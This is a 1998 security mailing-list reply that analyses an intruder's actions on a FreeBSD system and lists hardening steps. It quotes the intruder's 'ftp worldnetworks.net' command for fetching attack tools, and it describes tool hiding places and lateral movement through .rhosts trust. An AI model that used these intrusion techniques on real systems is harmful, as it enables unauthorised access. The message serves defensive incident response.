Date:      Thu, 27 Aug 1998 01:31:03 -0400 (EDT)
From:      "Craig H. Rowland" <crowland@psionic.com>
To:        Wilson MacGyver <macgyver@cylatech.com>
Cc:        security@FreeBSD.ORG
Subject:   Re: post breakin log

On Thu, 27 Aug 1998, Wilson MacGyver wrote:

. . .

> has anyone seen some of these programs he ran/install/compile
> before?
>
> Thanks,
> Mac

He is mainly pulling in tools from remote hosts to further leverage his
access, he is also running irc probably a sniffer and other typical
non-sense. You should go through your log and write to the admin of each
site listed to tell them about the problem so they can get rid of the
intruder as well. As an example you can look at his command:

ftp worldnetworks.net

Where he first went to get his bag-o-tricks to run on your box. Logging
into this server you can see that it is horribly mis-configured with FTP
as the owner of the root directory. The .forward file was modified to mail
the passwd list off to another account, etc. I'm sure if you go down the
list you'll find they are all compromised. This is pretty standard :(

The /dev/sync directory is just a hiding place for his tools. Other common
places include spool directories, user home directories, etc. It's pretty
hard to tell where things will be placed once inside.

The best thing to do is re-load your system (which it sounds like you've
done). You'll also want to do some other things such as:

1) Ensure users don't re-use old passwords.
2) Keep up-to-date with security problems.
3) Shut off unneeded services.
4) Monitor your logs for suspicious activity.
5) Don't allow users shell access unless they need it.
6) Keep off-line cryptographically secure checksums of key system binaries
and config files.
7) Limit access to system daemons to IP addresses that need them with some
type of "wrapper" or IP filtering mechanism.
8) Shut off your r-services (rsh, rlogin) if you don't need them. It looks
like he probably used a lot of transitive trusts (.rhosts, hosts.equiv) to
move around your network.
9) Too many more to list here. :)

Shameless plug: I wrote a quick page a while back describing some of the
more common attacks I've seen against hosts. It may contain some useful
information for you:

http://www.psionic.com/papers/attacks.html

-- Craig